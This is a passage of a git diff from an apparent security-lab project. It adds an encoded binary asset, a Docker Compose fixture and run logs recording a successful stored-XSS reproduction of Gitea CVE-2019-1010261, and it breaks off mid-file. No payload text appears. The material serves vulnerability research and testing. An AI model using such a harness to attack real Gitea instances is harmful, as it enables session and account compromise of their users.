zal2)1EJmP6)VJ|6J_U7i6K94rn?_llaVa+^dU>!wx^-oE%Xw$Tz|fSZN#7ooQ_gR<
zmc(HB_Nx2pXvJ^hKd@xSZ7$H>25|4PvNG4hHSOUNR0cYQnnus4d<iwT1A=>4?Q~cd
zl5_V~$mn3#s`^nS8=fv1PA_xs_nt~r)Hf_X;zBbJcS=i25-^;D+eQKo7W_5`pEi<#
zkQ>L9BjuRPZ*H*6O>wwOrBL9ij6@>azm6!S4##|p<FPF6l6rmdi{+fxrv#dz2J@`V
zTpo7`vY>$^I1O$&k6j4->vFKI-fvRAO0fb|C+$qL?4$jywn>0+oT(oj*3V_*!(u21
zr=~a!Kzk|Ty0_@OR_E(0UTP2oqA}7lIU}=*`9zuW$;U)kr5>K!0U-?NLzNE48r)QC
z%6(b$HR@ll!Vgy+F3G^B<jrdsuht#>`RzC{F)>3^SX<je4rFqDpT)Mcs!Na@?`?vY
z1(9nXiE;<FS0>6OiXU)(Pxn)-FrUm09&1EWF$TT#yQkk3a~tN034EIT051S=#uNF^
z7YTM6tEz*jM2sgJE=WC18@|I3h<cE-jf8FL*4M~JmtD5)PAmW;MchtY54zNQ(-Irs
z|2k~V`s3{6$gW=U{KU-6tVACj$NToYv^4X+y+X$8jG#MlL8L6PA(4QR>bU#ZpbG>E
z0KO5w%G;ajWi=yBEhIg_;@{Y47DYLJ8cc>Bo<tWa%-!QO0u~U6GtE9mM+3fBwOOj4
zQ1r3Jz&9-PYH?oOKf4_Z9;z#G{`K9Z%9KfFL=t=erAyRf@rr**UCjR<Bq$w9g9SR#
z))u>K+OU4kg4EHOAmg#1<Tq1#zvUozLx#WmYM+QqO`l2YxC?^n>(<(_i<8^&e9(c)
zJR_GRomNW_6-{T2!Ri5!U=7hxJ8R>$raWfhCyxz!CaPV~pQc2~DUgmhg^jQZJ?UW@
ze(c()18vO%TE93?Tzr?mf8-~Hg#cFV1j<}re5!U>3$!s9ED)NQ5KeoEmyc+~MlwEr
zUj3$|Jc2>G!l3&gIe0kDW%3Q#w|jin5*P(KS{E|n(MbfqFmnI%&7igxTdUX^PF?HV
zC>ik(Qdo)|fiEY}xOA?jS<NuCU-bs4d<>%jLC&$OYwga;3<fg{;1WH_h(3@{jCY&2
zg?=z@@W#$}lU*LAf{*pl2Z%EF1iv6sKVI@DVrQ@uDG#w#%GFsI8`kx{P8^COXg>1l
z>eqY??$S?sY}6+6c}`14m+{EM8$rgcnx~X%m39C!^PRtc$ptLlrR+<e8-NxfL2&XU
z{<#&<+w5=6tGIi5UA=Qr$zyb^#!Y;J4N)N%^=-8CXJApP>#Fm&LG+;G5x_!$e#dGW
z)g|Pz)9c(4Ld6cOZGvaH%3NC9D<rqLKo>7;*yAeMY#sdOk4FQzdqA*HH_7qR=p>fW
z7lxZm<$H#5u7SQ(be+p?LqO*WaD1fl#_L@I;48DqOfKTS2?`Iu;X3XuhE-SZfAkJO
z6#*&I4lay%5IMK`$cyYnZi}&_;VlyX)Qk1C;3LqR`O5KhBW>kPlX$R7D}J^Jd|+?R
zSE8vC@Ti383;!jy82=_$v2*>3KP+{J|3C?8M&+rOLLkt*)-3h(&Nsu?RDL9b>K!4V
zZ+xgY5K6Fh?~;a1Y2o2)+T{@1O}f{S5}C@UErFB`M!!~yCbnW9%72#&#!O+1)h@Lz
zE@_gHjV8;^ERZZZ0qL82^I)kt_cGi@lR;!W8QZMN2n?TnR~x9;Lr4Wu-=<|M+*0}e
zSu6H8sJpK0ZUsq2J!C6n)hr*aHVsKfs0XTX=rT3-4499mK_Dv8e;m6{pJqBD+PI-C
zEbQ~KG$TX*=;B7dFhQVr@I9AhtT_Uayo~`)>|pE2$jA#My#22ifuCqR)6%^@>GlxO
z(B-p}%WrQ)(>!r?MjVLpuN9V4o*~wcw5s0w0mbjdfYTOnw%dGH62peUQlH<Y>%?ub
zG^4<tNMC>iu0Iu4Y9$l7mFu0$r<(%=X#dnKx*xj`F)BQgP11U7`1%Y6eP9>=y$^Tu
zsG2RFyP!ZZOU3A=`~Gys>~CsOTqz2Ljz&B@?8yDAsudL#2L7=qREDil>h4Sy8bpI2
z>V}vw(%=>kAzETb?OF_nZu3x?)z&OyueLUtK{o1%PMxFFQ<~qP6033Cum;Lw`iPkY
z<;XHSWUzYRZeXkKnB<<$@6e;Hv)rG*dTYGlIp`8pS>+48Pm~R+y2Ac2DIY_uHxX(o
z+t7CcK5nFtIQHP?J!z@v!W22`CYnf%O5<OtqVaq-Bo)TJR%3g9C3C%*GUlKEbvH#n
zg=1|%^|X*)F)J`yEAF2S``X%CC0=&zhR+S-MOHSA?m}*^u9fRU8Ca*y?O_n;17zuu
z{-#<v8UU9N!t(6dwJSb@CVjltE{tHVEe!DZRAY^ng?@KhzKEg|?I;8+!YgnZgxwJW
zN5{`K+Egtkq#hmq6^_wVI6gY^6sFG->#P8~0XF%%#pOXu*W;u9Q3OaTgj|R2+j-&M
zTxy?$!;4v!qYPc<+MENaFS}-q+*Knyla22gzkg+|dwlaeK*w=uU#%L&0wsQTeKLB@
z&XfmSGt9?Fh~TgbF9T)%;xuQua<2V{D5k~F6(;>-qoXc6mG(K`-%kI?292&+-<O7?
z{r&w!zU6zYCVhKXr;Ta640P{p?d)7vt1YCFc0%;L11`SNQrS8_60f%fQEn~S<?*?!
zyj&*yg&!?GKKai|<I;hWE!e>9PUcbM)<~C_H$+$0)ac0FD4+gwc=>=3Hd1jOz5BnL
zBx~gX9qdG0Qjw9_iXF@O@s+fb_wc0>`R6)_0vuMx#?!<npPu0@*lIkR@&z1{gj_6~
zPrzU#WQOn%v{lK%NEP?Fcj6UgB~LiMWAn+-i6WC(Xq-92&mbIKSYXZ`sxl;JV5n^i
zqY`$#FE6uftZ$4VA5_nEygau$cZ}I0nGseH5pi4k3nbssveon#uRt?PK=*2|*FL@J
z+2#`HjwTwBh!Q35pMj^nL50O-CE?#o2>St6=yHgqkX+9^B)eX7R;iqqjH91f%~d5_
z#3g$3B69XOKz}X?d@)rOHHa5<a{l>D1GSgcN9KV-bT{=f58dDfq6?!~i@m?O@!MkK
znSq~OOhZ|uLdcB=MzZXdmUl3!+Br|%(({}TvE%KEnasDbfEn6XboT`KJ=h23U$YD1
zPY<Gstc)J4^{{WVn5ZL)JNY1dW}t!-2&PK45+B%HDp)|e;kG%Oy}3TaT36@U@@R02
zgfm?hxt6dD4h^8N$US<dljP%lt#1ol2g*%&<W9x`Imf^S&H+(g)<>b-C+vhPEg*yS
z=(!C~y0>>wVKP1i(({f+RD67GeMZLSOwd<A*DIe~Jvs5I{e(Krq^v)vuB~=*@}_=|
zTf2cooo=5!!Pj+BoR;<JsVOT^KF=Y#2GQ%QwYw@R3Vvn&dbb%B(vd0hwtyr>P$AeY
z3m;{)BFSKl9rfsdg6#BE_pBWKvrCO5x?XqVgJ0b?`ppcqIsV8#_@8X6)kXBjp`@e)
z2txWvg4OSM`F-pb*Q4m9>Gy3fi7<tVSblzSmFOaHDcC?}0JIclq*k4yRjEGO1W=x~
zq2AtNU<i_*mmm2vEOxdniPhQm@|@}?_<90gsH>~Xy?u{fMG<t4&l=93Vc6@ST2BBW
z4R{e0gP>=7UF5~GdbNW0GtUEI=c9Dj{T%4?ZOwPJCCnX$t!1H;FW<b^0ND$MTWA{{
zgW=qPx~bo^Pw`}Z78D!>HVMF0XMW3Lx8w!Z5%x=CLPM!G3$Ng$32+703B}4-MlEc;
z6e4PEvarAlj2ASHs|zCF1295R7CL5b4wG>tYBHGfD_c<$e(mH}R_=oO-xrUJZrpT$
zMJ7zpsd#!$r_tS9P!e!>Kn?-WZw40c*KF2p+a$m}R$G%C4KpwU8ih)*sxc_2`~VB(
z$vo>Q06e}}E}-qgwsTK{fq0```&!gIG=^XQIVAk8vN0?H)Rt*4{W#4JUigJA$?gB*
zG95So`Ipo~-WQdKVzV$POFw!`yE~pfJCN|wDL0W^Q7cX#MWZcy=ktL^dUJO#Qxz(*
z0>E@eQ=lg&PoX}GU_cKw=&DNOUWG!0fC&m&=pVSAY-T7lZz^=jAGU2+Bnu18R#oT+
zRBYN0<YilHxi4)G%cn84y<PK*$f6k?4x;3G0wNg^3jZtCu^iR!ysbM5RjS^914XlT
zgS8!K(61A-sJN50-sMQoAr;XP+%b<X0Q`<giZ@!saxwH=z4P(v@&dztj?1nvIC<=E
z4(Ee_49bS6RQMxm5NfcCaXC^b|4n}6w+GVKr7>!NjMH<RX#|P%>2_Mih@eTI91_{+
zetda%Rb;OvC|<o(pH#>shTj%sXPele;yVDF0BpE8v@)VulCtn}R0{{b9oNzlOI5~h
z?mX$;CXJvyUK=alJ!5%N3Ae!hB_@2|+Wp%$r-XU6<z!N=g9Yk|Y0PNl$m&5kGqgjh
z9XB?C=G*|x8?Ph0RZU;rqvQeu;43Zl6)+0u#8)KFqY;FU4f3X%E@wvvU963RBaAxr
zeBk@d&CRu+8<yGAAf>N(AEprQqMa#Q3}xk`w;j;ZNvA~7xNv8SmtVQk^scF;8v<~F
zYN34qv5fQ1lI1%ibkZ^5i<sob<jq_nRt*WATKm;~I7H_h!oRN{*pX2QIh&0sVmaoL
z?=$E_^?bP5pUZ?YZI`6Nl-dkZwlDbNud^wn%K_AhStT#Z*{(gj8F&FHGDHA%gQOZ*
za*IF(F-eA_vcc(4<?1h~n(lx10@9M|PofZtqgZVa?K4<bnoZar^i2sm*#PZbm!vIu
z9RQUC*XPd2uTT$4T0}l#Z2SiHE3PNo`uqOM1Qf?aNK$J16*Vv-K!Rx(*dNTTdIv;5
zP*>YtoT!!=C2o<XREkr|Hc={kkh(pSCA-<V!_)POQU0@<t$6lg0c0KTzGhJgzJFtw
zSi{928+&_TL#8m(sIRDj#oiNFCgTuX4j?yR)#T2XF9jxHLdw~l{pLIo2usLwq!_y<
zghxKz_JoodMK6;Bi3yup)eDNH^>r$Mn#^p#*X%*+V0ZU%mgt3S?cA0rQJ2}!-JxPP
zU{tRBzx0{RXRi@;=4;kY14D~*9@u-iN+-@3%)E>#<lw?~9bTn|!5t|eKe~tX3JU6u
z>zBr-7(y|~vN<s~(>dh^Gwx)VC^KiLwUg@!D}?YvAIi0iJo>Ws$eSz_Z<)h7H>NO%
z+kEK<Fg|mM)<cC~UzI?>z5HItLCdE=t>MeN=0dx1kjk5n*G%l$IINDbcz1w{M|%Y)
z4^MPQoo$;D6d#84<=~`+*Us6=O%B!=XKY)1)yu0B<!9(PsrLulYiu^mnwgQdg_@Pm
zYce+J#|cik^AH(q)p@~$V*MK#je)(HcGvgW^g?YfCuXsr%w+cu^e*l*0o9i=_tBfD
zRHTvrSHn!MBJh=Fs;fE%Sn;?Ru(-;<sHM$<C}7zF7#J~olBrhHQLSkf#VAjQpnjU9
z_=v4><R{E{ZG4^7l&VZ46BSkRH_w+6$-o%wY)@fUEtE9x-JAI1b8`vTEH_B%2cQ?v
z{1Sq^rM}`X43{n_RHN2%`k6Yof!!L*4S|@=Cj@VZ6=+84UnJUlv(P4@rG}kMg)Z2&
zUceKTsu-xH|CMEHisBt_Xqx0Q<#ODbckw7x&W)>keXZ)H_SK>L0u}4wuh@v@i-Ikk
zx#0Y|-+T&nhjD4#6lblgw@Cmo+jV;`$V$$72+t4j?=p$y14zMkeL(Wv(*Tv#z7y*s
zXJFB^Glgf<l1b~UUFDt42m1P-Z%s1zHxC&9)wp9aUaDJeh9jBpWeA)80;ZR~#;Ho0
zuWf8B&#hKv>8&kTTlhkgkjElH$Yqy`-*yOe3g=NHCP38(RJs^2Ne=fm?l7`C-y4@<
z+As#CFr<-)a_3dRUqghg09KVH<cO}IEC*TK$+1iBuh%Bdn}apVTR@Wp5afDyt-}Xm
zu5@E?s46=Pnj-I0s9mMfL5+ysA>)Bm%5ZuH7&Li0<v;j>fn{=tM=2Q2YxSMl^Dvr8
zT?>~^Dn_n8THy|}O4r4!Gl=M#QJE&zM9QS3-&V^56d0Wvy@o!f@$oSzHRk4~v>|S{
zN3`ZBwi~c0mkez!prct4`ykzqWmEJ#{=7bpd}w2HI88rZX*n4N@<jwhwn^v~v-Cr5
zHjqC_`!>%qnUX*T<#FfQCQ4FB1lmoUaOU8D?6DchGp3U!24UZDi9YkXkmDoQz5By-
z02ie7{4BuRHVc(oeO=vbX@e^_EgCu;Qk7ZJh9F%Pus37I7y)pGvs#I((o83-M^U)`
znJ0hP12K(K`=&W&)tMhwahy&G1RRp#v{5O`OU~4C$l;j%O(JE>GI)dDb=+M1w-p<-
zNQcqUY>4a^U44v?ac}Io$Jd)}?QP7|-yGTqhxDkhMAt}E8=V-94>*VhTe8V>1v+Fa
zYj1gL329#5$ZxdmtR&uPRg`~L?|!V|E;G46{65txf!AtmY&=l*8o7v-f{tRQ)ISHF
zK~$GdG8XvO#9i@>h9<Lt?VI}7VOd?z;#&bU`aQ0~Qoxn4wAF!pfjo`s7gE7A;z0`W
zHS%0$L#~_YRuC`NhSQ|M#4m%F<?S1rujAn&6!-FM47K~Eg~V@A0eA)zU8sX%)l|Rw
za37CitP$+xpq*{<-%w0dbe`!tOn$`xVhSK8^%t|w6M6fcF#lzK_{d7j&D`|gyjIhF
z`{#Dcu}i};oTW;!T3YiD&#l@e3fonIgG8<>QbwKN@jWhM(v|0NG4``<R{L8E5&qll
zcd}~imT4tZApOZ?2rDyt`<A-AHL>;vky18pA)@lL(^kvU=$rPqj$}d+$kHat)X6Y3
zT&uR2-&zf><vPcO8?Oc`-+VZN*-u$TNmn#GdWJ!kS-Bt^FWe{$&e4=o?FuvRBT4V-
z=iVi&Blaq~fswtetgO(1%JB&;)}>#YY)rFTCT`(szsI#K-G<LEsvdnt&PT}}E|T^#
zNWK;MX#_P|RC(y*^9n?kgAD-*;-N<4RT~HZ*;j87s<dMMF=*+Zjr?F%T(e_R?{e6n
zwa;YD{}NZShaJW*dB!R8+23h3`i!hUe%<CJ@VSh?hRBn6yK^Jh^|OuE0$8k(RgRP!
zq6eO;T6Nk-oS&Cn$g}ILh9Y^PlakYX>6Ozm;pltZ+3t9rmYGgJ@Wc9Osd%jQ)Q4T|
zQF7NaZJ4Irs4WgEFDJ17_4&ny?P;n^2?-j}k!y2BMlYUn@`p)FfMpet>wF#~P-4%h
zZ;r_j4q4*|30ah$A4kE#_B;e9@KcUbcHM}4#jAF(r!+dAyHX3>;_yj5FNjy29JxRG
zdJ;#Jvo$nfZ6NiV`_CN9eVfAyZ2}K`$~}#DBh|Xmua;NLcmplSZZW2bJ3NdLL9k@0
znFN$vx;CqNp~!XdyO_um0#j4NO1oYSm&=E5o5Tyj<Zm@rK-Jz!$bBUp8=4Lsd#Ot7
z5ehhGjMR@f@(J_eo)}jHAt{W;x6RK}g>^L7cb%SIGM>JiWvjrFRaZJZ@{!qF(u!pB
z>XM8(J8%{oISQc=3FEc;46dADoA)J#lw`TWY@FB(2T!FX5Tn1rZ8r9~0YwyPbL)&I
zlq@{n8bXy3@?!Z-Z{b6=`^j}{BJbsvY36oQ&hdT$!-5VA8^B$e+hM5$Y0s&th@XGI
zG3_J$1B&N(VQr0l4LC|!ETOr`h7n57OlqjAR@cz@qB@E@J+r(#HAQ`?>*tue>%lfD
zUp!b{m5e&9Jux;jx@Fq_d#;5hf!}SQv$MAf4V62}!=zd)UE-PH;@qk}`QO>dZ-DGt
zSxsxlgxn-+>TRezDzRT1VZL<gdD&j_8P~Iqj_nZ)5jLb@UEQLMcN;Z-_A52=nwl;H
zk>Cr$>*!-gB-?PRo92%FJ2)YJ(m>pz_3F#lH6mTy$sIf^1^jbI9u#<0E(YVB0aTnL
z)8FmGw1b>C#j@Hu1IW%JU*x6lh?)+V+*&aluixd80xXJ=^5RbA_h|CO!$YL`(M!B(
z@a;(!R9D!^ADR4qw48Br28C)-YCg4Rcn{>0a-5Z0e_i{;0_HDjcs#+}XqSuHS8C%S
zkBh;s#M(f=liz9c)ya_)rJ$oD_}3-BerIUNTrNJN&n<s=Q}XDd&v}j3VDmY26%wS{
zM;E4lfCW`~Qarci@<e_B0e=|H=p~Ih8u4H$oY#p=b1*&WtE866o$z#n^Cce*K?Efy
z5%!?E&Y(L=f6kvOF4Z2$fQ81r8CJ2}lAjAVS4T;rqQXAE^s}Co_$xcK)Srt)<)G5Z
zDQrVmbesKA0EL#`Ui{^msPZmmC2DC7w{(Fm6lbgqgQ$1Lf2f{Q1=S!Nx`E<gd4?<s
zdLyZ?M$B%6oVhF`d9Du12pAm$6(^qOba}jp{e0X5u!YLBir2HY|GL*R`n1Mj{rEt6
zVRNoiiUI-$0~kS2aO!>a4WW8oeYZu}{e+yR1wWoHxO9ry5xcEkL`4y|;i=snU3jDa
z5QwuTS=0tS2{f9*x|!QBn0$H{HYePz6P7sL{ObVSJ~L5&ct+KmEF4U25}#;1l&gCY
z263DWVadW#4t7WCr3O*gLNKXP7eN=V{kt%-I;v1@4#rF@@ypfg#ZpY_A6lXVX-QLT
z7O+H2kwQ)ffzCIv(d-r#+!fGd`MY&U%{p0aqpIWPCPQ>VMm8Sm7|BM0)C?R=Kw5EG
z$H%;Qu9UJ!hccHo?W}jfZwuE{b1fWHSJyO_Rl=KHC2I<b1mI$W{i=`E=>j@wut2x!
zh!^<L08dkLF*w0`4gCxqdGlY`CsQM<B}_!tlIHH8xF?F)4wpzChN^bf)16;4Kgl*k
z-%zCi<~Q{9Vq1=3T6TZfaxDQ<!eQ8xP-{1e$JcpZf2vsb#vpC2i(_E&BfcThBtDll
zz^{KZ*jYg9v@NGGgv=dD<R~%rrR2&}ZPl9XcgUyRkbN9}EYow5h(+nXj@AP7zD?q{
zvt9<0lRd5qh=NhQk^m462WpgU@bS?w_=WmcnQW?uqUq*@_cfxQY(3~Gq1+W*d`jUP
zSkJERZvEDH4x64u4#cQyFxlWR4EfvB7*f>(pU#enf85)keT)Pj)zt`r%G7h!%OYzA
zsZ=8A{gEjJu7?xKON@_projFk=k0TFY`IC<r+Td#kfDl&vymP!A{~C5)&E5uIXQ8G
zz{+$mhjP(J^D2Wv)MKG157My@sb9Et1e`IQC5q)>TtShYU6a&U1jp*P3x{Biun$D9
z5J>cJA^@6{KUVYhm??|5_!{BE)T2N@WAi+7dRbED*a|?zE7Y&_Z>^_^2gBXa^@CPn
z7<f~uN0LzyCkjIeg8E|sXQIP_ncwTpSKxitCuLpBoqs+*yLx!AX4gA_1nz&W`^W~F
zNsD3#yAG%hqI+B>RsfBPWQ}$0N!VXX;XJo0==*y{To&92!}#qwpk&K&vz~3EZ`Z0Y
z%o{3xC0mO;O|?Ke07HLqs5oLa&|^CrQCWeJ?7G0Tzo3O?K8KpnthC5Io=g9l-mXi+
zs!;)nE-ZKV8upkBeo-yd5nBxnIkTVuPUfoX!K+Wo$B+d`xw)^z-0sgA{KbY_QCw_1
zUgK@sm3&%%s~$P|j4y)Iv1p1<$7X>|>AB%@)GEDCCJ=z%rFyk=piD2-L^yTF-9$R9
z_NBN}u;NtWS7kYDeAfTg)A9ZHyYZ2^k`g*;H}iY-_WAduo~|Bb1>Ej~|2F3poN)dw
zzgZ-KoD-X3CV+b4?TtlaT6l`%VAH~EvOw8;Q{Mo6a`0&eDxvme$j@Qt$Kw&KH6@hj
zb!!#BbK-lmI=sBB>jJDlXpvo#d=YeSAX<-^s0e)DR>x~s+ro4iWD|N~nSC#^`YvKi
z4Z0%&P2PPWI0sQr8vIiGj%i1@_HuP*{!l6sM!xt+DRdZ2#bYvcG~6s5MaF41)8AnH
z?_NM3n4KN$tkV&_&KBn~>ANo({sQ(X<ZR-M=`+Ee(C0@fOyD}7SC|f}bM_zYm(u#j
z#OQth0TP$MuoC;z6H)RN;L=;LF*-;-^=uLkp+Lv;?8b030Zx=wGF;8=Vc7iE0(*9E
zW_S{$W>I=WCHlQE(RpH~w!R%}qs*+Dr;#z8Si8%nRhNE|aG*r5r!T|C7n*y-EWlOp
zBQWvAy@{x?JsGQJ^Sn%|lH=yf&7u2)*Kx6Eg-GP)SI!eSr#qtAZT@`ifqP0qpHrjn
z*60J3(UP^^+QSK<!~Q$OC0(MpyP7p-8GRzquKF`GBVgY0igB@X-#fBBqSNU^<@&_V
zTECD(0lAb{yAQwZo&@lVcUMMg431kgc`Q&Y>VghQ<SHsrHVf>W4M&dHgna@JDEF|<
ztI|JTjF+i5!A{YorE1&uYxxiE<pC3@Jy&V{^qONqct>li%Vs1gB_(Ca8}Dnx?_)Wf
z=5n|)q@yDdb8t!}d%eG15}g&Dupt@tU_X*^Mx{_In#(1s@g(OEw$9~rTq!>#SU7HB
z^Ap~M9)ktiyUr*Xpu*(o_d!Mbj!Qphi-Zk)ldNXjs5_(cJ0kf+!BTu~ki&RW>8$A*
zc(&5ge&;6o7iKKG){4cfKc}fDF+RPmRDU@bRw-nXxj7ux62krGWUm@|nzZ(e_hyn6
zXmJTWQEL!J6bfN?@HZaJ%BQu4PzY$%FDd)m!L`gmoE~nJAwv&J2E<KrOb5;LRLXyE
zV<Ldt+FN=0hVMc2-)uY~hXK2lDoLq_WA!fVL&h1ztm1!v*K_~*RurDClCN<VNf=wC
zXz?&J>96?pbEHSPS!t)fNY`5R68rK0X62}Itu6t(aRsWSTARU%cVgF#N#y@)l%)_V
z8+!i)Mp^fGEckR=^uR6UCkeaGzxh#^@Mar2vd-i>RACC3!BgiaBECiq3eSOWN4@h7
z)srvD2W4-mF_ns0>$?F52M0{l%e@XMN>;fl`H`Gr{<RKk9Zc-%oaj-3n9>{ZJm&B!
zo&jq+fQXglT$Nib+hZ;I&V7>oh*T&O>YaBLM>Szm7@JNL8$$5&<MyZ9x?p~z=~skZ
zt%X5Wo^ixWnG2Mgw1PtQ;Co2=a9uL>q<?u(0X?W;^jL+xieR@u+ePN`pNm&-qMvlc
z(!_6Qca$(la7G5>QJh5eKD1_&baUTX6>uOs>hJq87FTH`06nBSCu`}X=*kdEk!*Du
zB?iBb%J~|JT&7X&&h5!HHn=rxLfbR(Ix@o_NZ1m9J}0>!QE82vFC9$@vspQaHQ(F1
zCK&V2k4q$RkB^&@phP5c^x73^Lzc-GPU?LDSbe=Ot^kud6~%8SCD}+_E<*0Cz#Q<e
zxmG4kM`0Y0($kmX!B4xk%|4n<hub|chu}TFAsB<96NGbx@AN-`Eh*#P%&2Rr7ymr<
zgy}-2bo_i@Y^j10tZF%x=oKfvlk6AT?!MHiDq=EQL?a$z%<7vPQW}2e;y2;z{13CK
z47$VjhXY7P%74azOU77(9m5cD)`N%6w!Q#1ny9upLkxE``k=~{3&@AHwb?I@2t9w`
zqSTWxY&ll9FU^_0BFLzi!RxeX`w-dqmI9GhFb~I5zW~f?_UQh#mP>T0<{6NVM5sJI
zgytbCIjyF>!2VIdZ9b3i(PjK45&`=>pCAnYb3KDfYLDj1S7$I&#5o~_%dT1CH~~EA
z<KyFg;yRT=b=iM_HZVoP{fn-0KQ;(XxCC9>c!+civPqPD)(O&Q9)o{1VX5;-Hyv9G
z1kly}S8yr5T8iP|!teiIm|uLXJ}<Pfu@Ow@S4s)b=<(oki}1w6wQVn)Ja(8_sBm+i
zExM(+sBl*#B~kv@<7<=y+!g<Ne1MxfX>IM_|9(wn;2)okuX5+Gz;U{9P7P5fD3t%@
zpP`n|wW54-O6H$;V5!;B#VIyE9#-DYw!=JvV`Jl)4Gf-q%z*XC@%_JR`EG$~|2)4g
zUU0E+gG=sH!z*8Fw$^r*+vHdC^Ng>bahUk^^>s~2=$2{+EeRLlM};H_xh@ilgu&Iq
zSqvw?A>y_z@!{k}iQo7BqMDh71;fmTVQDXI91io~AK*Ao-yI!Z-6Gj#M-VRJ6TL}v
zKE>vv^0gz4ex2>pKIQq$&#R$6>gw1z-pDU@Nv%=XZSNM%Yx4c$T4XBT4S3b3NQFbx
zy`R0l_(Y3D=hOyiFKB9L3N%YEPGN@!2gTvq;ha#Z4-d7-B#f>0E)25kJp9RVzG%X!
zrWSd!&GGuki<mg-cmBhZvv>OU^n2HspmX35Hkcz>*zwQWeCAUCRwe#s^7#BB<aY1G
zuV0gs=-#IB&ZhC+CQ%*6>u2M_MgYrP&)(G-9a0+}YR`RVfZbRfb+B}tzI_9hgg<y^
zWE?$yyI0C}luNDu_H0<axBhoyBT6GUtG3p+);BuKH>9%iysK_1&dXV<EBl9=n257a
z59btd<?Gq+INJCBC(k4Q^CHi#(NmKDd=CHl9R9nQ;y?Gp|E~KX<?LIG|DUV&zw4@<
zz1sg@#>e|?RL~2!5HI=SnbLob9or8$kPZIt{2cbE4(;xrz4-fWlg^=?4?HfNgTms?
zvojf)+O0S67sMCAfA2pJ|1bMYAc;RcWr>Nv!WG0l`<h<BxnAJ2yyz8krd`C56np)m
J;Q5=6{|6$c)%5@X

literal 0
HcmV?d00001

diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml
new file mode 100644
index 00000000..a94cc2b7
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml
@@ -0,0 +1,26 @@
+services:
+  app:
+    image: python:3.12-alpine
+    networks:
+    - labnet
+    ports:
+    - 18102:3000
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/xss/scenario.json
+      PORT: '3000'
+    command:
+    - python
+    - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    working_dir: /workspace
+    volumes:
+    - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+      - CMD-SHELL
+      - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+networks:
+  labnet:
+    driver: bridge
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json
new file mode 100644
index 00000000..63ffc9ac
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json
@@ -0,0 +1,53 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.xss",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json"
+    }
+  ],
+  "success": true,
+  "detail": "stored payload rendered inside the browser proof page",
+  "before": {},
+  "attack": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "stored payload rendered inside the browser proof page",
+      "case_id": "gitea--CVE-2019-1010261"
+    }
+  },
+  "after": {},
+  "proof": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "success": true,
+      "detail": "stored payload rendered inside the browser proof page",
+      "case_id": "gitea--CVE-2019-1010261",
+      "sink_hits": 0,
+      "uploads": [],
+      "events": [
+        {
+          "event": "seed",
+          "detail": "gitea--CVE-2019-1010261"
+        },
+        {
+          "event": "attack",
+          "detail": "stored payload rendered inside the browser proof page"
+        }
+      ]
+    }
+  },
+  "assertions": [
+    {
+      "name": "proof-success",
+      "kind": "runner-proof",
+      "passed": true,
+      "detail": "stored payload rendered inside the browser proof page"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-browser.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-browser.json
new file mode 100644
index 00000000..461e1d6e
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-browser.json
@@ -0,0 +1,14 @@
+{
+  "required": true,
+  "present": true,
+  "page_title": "Gitea Stored XSS Fixture",
+  "page_url": "http://127.0.0.1:18102/",
+  "error_kind": null,
+  "refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json"
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json
new file mode 100644
index 00000000..fe51488c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json
@@ -0,0 +1 @@
+[]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json
new file mode 100644
index 00000000..cdb46ccf
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json
@@ -0,0 +1,6 @@
+[
+  {
+    "method": "GET",
+    "url": "http://127.0.0.1:18102/"
+  }
+]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json
new file mode 100644
index 00000000..ec95fa8d
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json
@@ -0,0 +1,5 @@
+{
